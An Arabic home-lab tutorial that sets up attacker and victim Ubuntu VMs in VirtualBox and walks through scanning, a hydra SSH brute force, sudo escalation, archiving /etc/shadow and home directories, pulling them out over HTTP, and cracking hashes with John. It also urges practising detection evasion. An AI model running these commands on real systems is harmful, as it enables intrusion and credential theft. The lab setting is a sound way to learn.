🔥 النصيحة الذهبية - اهاجم نفسك في VirtualBox!
═══════════════════════════════════════════════════════════════════════════════

هذا أفضل طريقة للتعلم بدون أي مخاطر قانونية!

═══════════════════════════════════════════════════════════════════════════════
الخطوة 1: تحميل VirtualBox (البرنامج)
═══════════════════════════════════════════════════════════════════════════════

🔴 ماذا هو VirtualBox؟
   = برنامج يخليك تشغّل كمبيوتر وهمي داخل كمبيوترك!
   = يعني تشغّل Linux داخل Windows!

🔴 كيف تحمّله؟

1. افتح متصفحك واذهب إلى:
   https://www.virtualbox.org/wiki/Downloads

2. اختر "Windows hosts" (لأنك على Windows):
   رابط مباشر: https://download.virtualbox.org/virtualbox/7.0.x/VirtualBox-7.0.x-Win.exe

3. انسخ الرابط واضغط Download

4. بعد ما تحمّل الملف (حوالي 150 MB):
   - اضغط عليه بـ double click
   - اختر "Install"
   - اتبع الخطوات (كلها Next)
   - اضغط Finish

✅ VirtualBox مثبت!


═══════════════════════════════════════════════════════════════════════════════
الخطوة 2: تحميل Linux (Ubuntu)
═══════════════════════════════════════════════════════════════════════════════

🔴 الآن تحتاج Linux ISO file

1. افتح https://ubuntu.com/download/desktop

2. اختر "Ubuntu 20.04 LTS" أو "Ubuntu 22.04 LTS"
   (أي version حديثة تمام!)

3. سيبدأ التحميل (حوالي 2-3 GB - سيأخذ وقت!)
   
   الملف اسمه شيء زي:
   ubuntu-22.04.3-desktop-amd64.iso

4. احفظ الملف في مكان تتذكره (مثل Desktop)


═══════════════════════════════════════════════════════════════════════════════
الخطوة 3: إنشاء Virtual Machine في VirtualBox
═══════════════════════════════════════════════════════════════════════════════

🔴 الآن افتح VirtualBox

1. اضغط "New" (الزر الأزرق في الأعلى)

2. ستظهر نافذة:
   
   في "Name": اكتب
   Linux-Test

   في "Machine Folder": اترك الافتراضي

   في "Type": اختر "Linux"

   في "Version": اختر "Ubuntu (64-bit)"

   اضغط "Next"


3. في الشاشة التالية "Memory":
   
   اختر: 4096 MB (4 GB)
   (لو في مشكلة، اختر 2048)

   اضغط "Next"


4. في "Hard Disk":
   
   اختر "Create a virtual hard disk now"

   اضغط "Create"


5. في "Hard disk file type":
   
   اترك الافتراضي "VDI"

   اضغط "Next"


6. في "Storage on physical hard disk":
   
   اختر "Dynamically allocated"

   اضغط "Next"


7. في "File location and size":
   
   قيمة: 20 GB (كافية للاختبار)

   اضغط "Create"

✅ الآن Virtual Machine مُنشأة!


═══════════════════════════════════════════════════════════════════════════════
الخطوة 4: تثبيت Ubuntu داخل Virtual Machine
═══════════════════════════════════════════════════════════════════════════════

🔴 الآن ننصب Linux على الـ VM

1. في VirtualBox، اختر الـ VM اللي أنشأتها "Linux-Test"

2. اضغط "Start" (الزر الأخضر)

3. ستسأل عن ملف الـ ISO:
   
   "Select start-up disk"
   
   اضغط على folder icon
   
   اختر الملف اللي حمّلته:
   ubuntu-22.04.3-desktop-amd64.iso

4. اضغط "Start"

5. سيبدأ Ubuntu boot:
   
   اختر "Install Ubuntu"

6. اتبع الخطوات:
   
   - Language: اختر English أو العربية
   - Keyboard: English (US)
   - Normal installation
   - Erase disk and install Ubuntu (لأنه VM وليس حقيقي)
   - Location: اختر موقعك
   - Create your account:
     
     Username: test
     Password: password123
     Computer name: linux-test

7. اضغط "Install Now"

8. سيأخذ حوالي 10-15 دقيقة
   
   اترك يشتغل...

✅ Ubuntu مثبت!


═══════════════════════════════════════════════════════════════════════════════
الخطوة 5: التشغيل الأول و الإعدادات
═══════════════════════════════════════════════════════════════════════════════

🔴 بعد التثبيت

1. ستطلب restart
   
   اضغط "Restart Now"

2. بعد ما تشتغل Ubuntu:
   
   ستطلب كلمة السر:
   اكتب: password123

3. الآن أنت داخل Ubuntu!
   
   شاهد هذا:
   - Desktop
   - Applications menu (في أسفل اليسار)
   - Files manager


═══════════════════════════════════════════════════════════════════════════════
الخطوة 6: تثبيت أدوات الهجوم داخل Ubuntu
═══════════════════════════════════════════════════════════════════════════════

🔴 الآن نثبت أدوات الهجوم

1. افتح Terminal:
   
   اضغط على Applications
   اكتب "Terminal"
   اضغط عليه

2. الآن أنت في Terminal (بسود و أبيض)

3. اكتب هذا الأمر:
   
   sudo apt-get update

   سيسأل عن كلمة السر (password123)

4. بعد ما ينتهي، اكتب:
   
   sudo apt-get install -y nmap nikto hydra sqlmap curl wget git

   هذا بيثبت جميع الأدوات!

5. انتظر شوي...

✅ كل الأدوات مثبتة!


═══════════════════════════════════════════════════════════════════════════════
الخطوة 7: إنشاء جهاز ضحية ثاني (اختياري لكن أفضل!)
═══════════════════════════════════════════════════════════════════════════════

🔴 الأفضل أن يكون عندك جهازين:
   - جهاز Attacker (الجهاز الأول)
   - جهاز Target/Victim (الجهاز الثاني)

اتبع نفس الخطوات 1-6 لكن هذه المرة:

- في الخطوة 3: اسم الـ VM: Linux-Target

- في الخطوة 6: استخدم نفس أدوات الهجوم

الآن عندك جهازين!


═══════════════════════════════════════════════════════════════════════════════
الخطوة 8: ربط الجهازين معاً (Networking)
═══════════════════════════════════════════════════════════════════════════════

🔴 المشكلة: الجهازين لا يشوفوا بعض!

الحل: نغيّر Network Mode

في VirtualBox:

1. اختر VM الأول (Attacker)
   
2. اضغط "Settings"

3. اذهب إلى "Network"

4. في "Attached to": اختر
   "Bridged Adapter"

5. اضغط OK

6. شغّل الـ VM

7. افتح Terminal واكتب:
   
   ip addr show
   
   ستظهر IP الخاصة بك:
   192.168.x.x

8. انسخ هذا الـ IP

9. افعل نفس الشيء للـ VM الثاني

الآن الجهازين متصلين!


═══════════════════════════════════════════════════════════════════════════════
الخطوة 9: اختبار الاتصال بين الجهازين
═══════════════════════════════════════════════════════════════════════════════

🔴 الآن نتأكد الاتصال يشتغل

من الـ VM الأول (Attacker):

في Terminal، اكتب:

ping 192.168.x.x  (IP الـ VM الثاني)

مثال:
ping 192.168.1.105

النتيجة الصحيحة:
─────────────────────────────────
PING 192.168.1.105 (192.168.1.105) 56(84) bytes of data.
64 bytes from 192.168.1.105: icmp_seq=1 ttl=64 time=2.45 ms
64 bytes from 192.168.1.105: icmp_seq=2 ttl=64 time=2.41 ms
─────────────────────────────────

✅ الاتصال يعمل!


═══════════════════════════════════════════════════════════════════════════════
الخطوة 10: الآن نبدأ الهجوم! 🔥
═══════════════════════════════════════════════════════════════════════════════

🔴 من VM الأول (Attacker)، في Terminal:

1. مسح المنافذ:
   
   nmap -sV 192.168.1.105
   
   (استبدل الـ IP بـ IP الـ VM الثاني)

2. مسح الويب (إذا في web server):
   
   nikto -h http://192.168.1.105

3. SSH Brute Force:
   
   أولاً، اصنع ملفات:
   
   echo -e "root\nadmin\ntest" > users.txt
   echo -e "password\nadmin123\n123456" > passwords.txt
   
   ثم:
   
   hydra -L users.txt -P passwords.txt ssh://192.168.1.105

4. الدخول:
   
   ssh test@192.168.1.105
   
   كلمة السر: password123

✅ أنت بداخل الـ VM الثاني!


═══════════════════════════════════════════════════════════════════════════════
الخطوة 11: الترقية إلى Root
═══════════════════════════════════════════════════════════════════════════════

🔴 من داخل SSH:

اكتب:
sudo -l

النتيجة:
User test may run the following commands without password:
(ALL) ALL

يعني تقدر تعمل كل شيء!

استخدمه:
sudo su -

النتيجة:
root@linux-test:~#

🎉 صرت ROOT!


═══════════════════════════════════════════════════════════════════════════════
الخطوة 12: سرقة البيانات
═══════════════════════════════════════════════════════════════════════════════

🔴 الآن خذ البيانات:

كلمات المستخدمين:
cat /etc/shadow > /tmp/shadow.txt

البيانات المهمة:
tar czf /tmp/data.tar.gz /etc/shadow /etc/passwd /root /home

شاهد الملف:
ls -lh /tmp/data.tar.gz


═══════════════════════════════════════════════════════════════════════════════
الخطوة 13: نقل البيانات للـ VM الأول
═══════════════════════════════════════════════════════════════════════════════

🔴 في VM الثاني (بداخل SSH):

ابدأ simple HTTP server:
cd /tmp
python3 -m http.server 8888

سيظهر:
Serving HTTP on 0.0.0.0 port 8888

🔴 في VM الأول (Attacker):

في Terminal جديد:
wget http://192.168.1.105:8888/data.tar.gz

النتيجة:
data.tar.gz           100%  234MB  5.2MB/s   00:45

✅ الملف انتقل!


═══════════════════════════════════════════════════════════════════════════════
الخطوة 14: كسر كلمات السر
═══════════════════════════════════════════════════════════════════════════════

🔴 في VM الأول:

استخرج الملف:
tar xzf data.tar.gz

ثم:
cat etc/shadow > shadow.txt

استخدم John:
john shadow.txt

النتيجة:
─────────────────────────────────
Loaded 2 password hashes with 2 different salts
test:password123 (test)
root:password123 (root)
─────────────────────────────────

✅ وجدنا الكلمات السر!


═══════════════════════════════════════════════════════════════════════════════
ملخص ما فعلنا:
═══════════════════════════════════════════════════════════════════════════════

1. حمّلنا VirtualBox
2. حمّلنا Ubuntu
3. أنشأنا VMs (واحد attacker، واحد victim)
4. ثبّتنا الأدوات
5. ربطنا الجهازين معاً
6. بدأنا الهجوم:
   - Nmap scan
   - Nikto web scan
   - SSH Brute Force
   - SSH Login
   - Privilege Escalation
   - Data Exfiltration
   - Password Cracking

✅ كل شيء 100% نظيف وآمن داخل جهازك!


═══════════════════════════════════════════════════════════════════════════════
الفوائد:
═══════════════════════════════════════════════════════════════════════════════

✅ لا توجد مشاكل قانونية
✅ تتعلم على حقيقة
✅ تقدر تكسر الـ VMs و تشغّلها من جديد
✅ تقدر تحتفظ بـ snapshots قبل الهجوم
✅ تقدر تجرب تقنيات جديدة


═══════════════════════════════════════════════════════════════════════════════
نصائح إضافية:
═══════════════════════════════════════════════════════════════════════════════

💡 اعمل Snapshots:
   قبل الهجوم، اضغط "Machine" → "Take Snapshot"
   لو حاجة خربت، تقدر ترجع!

💡 Shared Folder:
   اعمل shared folder بين الـ VMs لتسهيل نقل الملفات

💡 خذ screenshots:
   توثّق كل خطوة!

💡 اختبر تقنيات مختلفة:
   جرّب exploits مختلفة
   جرّب طرق التهرب من الكشف


═══════════════════════════════════════════════════════════════════════════════
الآن أنت جاهز!
═══════════════════════════════════════════════════════════════════════════════

تفضل:

1. حمّل VirtualBox الآن
2. حمّل Ubuntu
3. اتبع الخطوات
4. ابدأ الهجوم!

Good luck! 🔥🚀

═══════════════════════════════════════════════════════════════════════════════
